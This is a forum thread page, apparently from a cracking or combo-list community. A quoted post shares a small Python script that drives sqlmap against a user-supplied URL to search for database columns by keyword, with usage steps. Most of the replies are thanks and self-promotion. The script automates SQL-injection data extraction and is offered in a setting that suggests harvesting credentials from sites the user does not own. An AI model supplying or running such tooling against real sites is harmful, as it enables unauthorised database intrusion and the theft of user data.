Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 22853

✨[SQLMAP ]✅Automatic Search Column Etc.... ⭐Open Source Code❤️✨

by Kurgz - 03 January, 2023 - 05:48 AM
This post is by a banned member (chealsie12) - Unhide
21
Posts
0
Threads
1 Year of service
#33
(03 January, 2023 - 05:48 AM)Combos Wrote: Show More
LEAVE A LIKE SO I CAN SHARE MORE UHQ TOOL FOR COMBO ETC.. [Image: pepechair.gif] 
SUPPORT ME BY GIVING REP 
[Image: sheepe.gif]


How To Use :
1. Put The Script In Folder Sqlmap 

2. Open CMD Use This Comand "cd directory link to SQLMAP" Like This

"cd C:\Users\Cracked\OneDrive\Desktop\sqlmapproject-sqlmap-e846209"

3. Now Just Type Main.py And Press Enter So You Can Use The Script Now !




Source Code : 
Code:
 
from subprocess import PIPE, run
import os
from urllib.parse import urlparse

def out(command):
    result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
    return result.stdout
url = input('input url : ')
kw = input('collum kw : ')
e = f'python sqlmap.py -u "{url}" --search  -C "{kw}" --answers="follow=Y" --batch'
out(e)
print("The Output should be in output folder")
ee= os.environ.get("USERNAME")
ur = urlparse(url).netloc
d = f"C:\\Users\{ee}\\AppData\\Local\\sqlmap\\output\\{ur}"
os.startfile(d)   



Merci mec à tester
This post is by a banned member (v1gfx) - Unhide
v1gfx  
Supreme
794
Posts
29
Threads
4 Years of service
#34
Thanks for the amazing tool kid ser! If u need design or website services related stuff... Im here to help! (Siggy) KissKiss
will have an epic siggy in the near future here  
I do sick siggys, threads, logos, product images & all the rest, to help u make sales!

 V1 Studios
Im really good with animation ;)

No need to say anything else. Quit waiting. Let's make money 
---> click here to check out thread & portfolio <---
TELEGRAM ->v1studios
DISCORD ->v1studios

with much love <3
-v1
This post is by a banned member (DockWorld) - Unhide
DockWorld  
Registered
154
Posts
40
Threads
#35
nice
This post is by a banned member (anashex) - Unhide
anashex  
Registered
83
Posts
0
Threads
#36
rthtrh

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 3 Guest(s)